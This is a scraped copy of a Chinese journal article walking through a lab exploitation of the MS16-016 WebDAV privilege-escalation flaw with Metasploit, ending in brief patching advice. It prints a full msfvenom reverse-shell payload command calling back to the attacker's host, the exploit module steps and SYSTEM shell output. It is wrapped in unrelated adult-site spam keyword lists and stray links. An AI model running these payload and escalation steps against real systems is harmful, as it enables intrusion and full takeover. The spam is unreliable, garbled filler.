999精品在线视频,手机成人午夜在线视频,久久不卡国产精品无码,中日无码在线观看,成人av手机在线观看,日韩精品亚洲一区中文字幕,亚洲av无码人妻,四虎国产在线观看 ?

基于Metasploit的MS16-016本地溢出漏洞利用實戰

2018-01-20 06:42:04趙秋
電腦知識與技術 2018年31期
關鍵詞:程序設置利用

趙秋

摘要: 該文對MS16-016本地溢出漏洞做了簡單介紹,文中分析了利用MS16-016本地溢出漏洞,滲透到Windows 7中并獲取系統權限的實現方式,最后給出了對應的防范措施。

關鍵詞: Metasploit;MS16-016;本地溢出漏洞

中圖分類號:TP393? ? ? 文獻標識碼:A? ? ? 文章編號:1009-3044(2018)31-0216-01

1 漏洞介紹

MS16-016這個漏洞是由于Windows中的WebDAV未正確處理WebDAV客戶端發送的信息導致的。若要利用此漏洞,攻擊者首先必須登錄系統。然后,攻擊者可以運行一個為利用此漏洞而經特殊設計的應用程序,從而控制受影響的系統。此漏洞存在于在:Windows Vista SP2、Windows Server 2008 x86 & x64、Windows Server 2008 R2 x64、Windows 7 x86 & x64、Windows 8.1 x86 & x64。系統中提升權限至系統權限,以下系統中導致系統拒絕服務(藍屏):Windows Server 2012、Windows Server 2012 R2、Windows RT 8.1、Windows 10。

2 MS16-016本地溢出漏洞利用的實現

下面介紹在Kali中滲透Windows 7 x86的實現。Kali的IP地址為10.3.81.106,Windows 7 x86的IP地址為10.3.81.152,使用虛擬機kali 中的Metasploit利用MS16-016本地溢出漏洞對Windows 7的進行滲透,從而獲得系統權限。

1) 在Kali上生成連接軟件msf.exe,LHOST為Kali的IP地址

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.3.81.106 LPORT=4444 -f exe > msf.exe

2)在命令行下輸入“msfconsole”,進入MSF的啟動界面

root@kali:~# msfconsole

3)在Metasploit命令提示符下,使用use命令載入監聽模塊。設置payload為windows/meterpreter/reverse_tcp。設置本地監聽主機IP地址為Kali的IP。可以使用show options查看相關參數,輸入exploit命令開始監聽。

4)將軟件msf.exe發給Windows 7上運行,此時kali上會有連接提示,可以看見MSF彈回了一個session 1(會話連接)。接著,在Meterpreter Shell中利用getuid命令查看已獲得的權限為user權限。我們要把它提升到system權限,即Windows最高權限。

5)輸入命令background,把當前的metasploit shell轉為后臺執行。選擇MS16-016這個漏洞在進行提權,同時設置剛才連接的ID為1。最后,執行exploit命令進行提權,可以看到成功的把漏洞利用到了PID為2872的進程中。

6)雖然提權成功了,但連接到的ID為1的會話連接中,執行getuid命令還是看見的是user權限。

msf exploit(windows/local/ms16_016_webdav) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > getuid

Server username: cmx-PC\cmx

7)使用migrate 命令,遷移到該進程ID中。

meterpreter > migrate 2872

[*] Migrating from 4068 to 2872...

[*] Migration completed successfully.

8)然后執行getuid命令再次查看權限,可以看到已經是系統權限了,輸入shell測試。

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > shell

Process 608 created.

Channel 1 created.

Microsoft Windows [版本 6.1.7601]

版權所有 (c) 2009 Microsoft Corporation。保留所有權利。

C:\Users\cmx\Desktop>

3 MS16-016本地溢出漏洞的防御

你也可以通過 Windows 更新獲取此更新程序。在你開啟自動更新后,系統會自動下載并安裝此更新程序。https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2016/ms16-016用戶可從此獲取獨立的更新程序包。此安全更新程序通過更正WebDAV驗證輸入的方式來修復這個漏洞。

參考文獻:

[1] 祝烈煌,張子劍.網絡攻防實戰研究漏洞利用與提權[M].北京:電子工業出版社,2018.

[2][英]Nipun Jaswal,李華峰.精通Metasploit滲透測試[M]. 2版.北京:人民郵電出版社,2017.

[3] http://www.freebuf.com/vuls/95950.html.

猜你喜歡
程序設置利用
利用min{a,b}的積分表示解決一類絕對值不等式
中等數學(2022年2期)2022-06-05 07:10:50
中隊崗位該如何設置
少先隊活動(2021年4期)2021-07-23 01:46:22
利用一半進行移多補少
試論我國未決羈押程序的立法完善
人大建設(2019年12期)2019-05-21 02:55:44
利用數的分解來思考
Roommate is necessary when far away from home
“程序猿”的生活什么樣
英國與歐盟正式啟動“離婚”程序程序
環球時報(2017-03-30)2017-03-30 06:44:45
本刊欄目設置說明
中俄臨床醫學專業課程設置的比較與思考
主站蜘蛛池模板: 国产91无码福利在线| 国产真实乱子伦精品视手机观看 | 亚洲经典在线中文字幕| 成人国产精品网站在线看 | 色悠久久综合| 亚洲无限乱码一二三四区| 色妞www精品视频一级下载| 一区二区三区在线不卡免费| 男女精品视频| 欧美精品成人| 欧美激情成人网| 国产在线视频福利资源站| 国产精品成人AⅤ在线一二三四 | 99re热精品视频中文字幕不卡| 久久久国产精品无码专区| www.亚洲一区| 国产资源免费观看| 亚洲三级a| 日本精品影院| 国产sm重味一区二区三区| 欧美精品在线免费| 色综合久久久久8天国| 午夜视频日本| 国产精品女同一区三区五区| 91免费在线看| 国产亚洲欧美在线视频| 欧美在线一二区| 在线播放国产99re| 欧美日韩第三页| 在线欧美日韩| 久久久噜噜噜| 国产精品太粉嫩高中在线观看| 网友自拍视频精品区| 午夜视频www| 欧美精品不卡| 日韩毛片在线视频| 亚洲熟女中文字幕男人总站| 99re热精品视频国产免费| 日韩a在线观看免费观看| 国产午夜不卡| 亚洲乱码精品久久久久..| 全裸无码专区| 日韩欧美高清视频| 一边摸一边做爽的视频17国产| 亚洲精品在线影院| 国产交换配偶在线视频| 亚洲一区精品视频在线| 九九视频在线免费观看| 亚洲国产中文精品va在线播放| 日韩久草视频| 乱人伦99久久| 夜夜操国产| 欧美成人第一页| 欧美综合区自拍亚洲综合绿色| 97免费在线观看视频| 亚洲无线视频| 色婷婷天天综合在线| 国产第一页免费浮力影院| 一级成人欧美一区在线观看| 国产一级在线播放| 亚洲黄色成人| 久久 午夜福利 张柏芝| 成人小视频网| 欧美国产视频| 999精品视频在线| 亚洲精品卡2卡3卡4卡5卡区| 无码高清专区| 婷婷六月天激情| 久久婷婷国产综合尤物精品| 伊人久久大香线蕉综合影视| 精品无码一区二区三区电影| 色窝窝免费一区二区三区 | 日韩高清欧美| 国产97视频在线观看| 亚洲欧美另类日本| 国产丰满大乳无码免费播放| 欧美区一区| 久久伊伊香蕉综合精品| 美女裸体18禁网站| 亚洲国产成人无码AV在线影院L| 99在线视频网站| 欧美日本激情|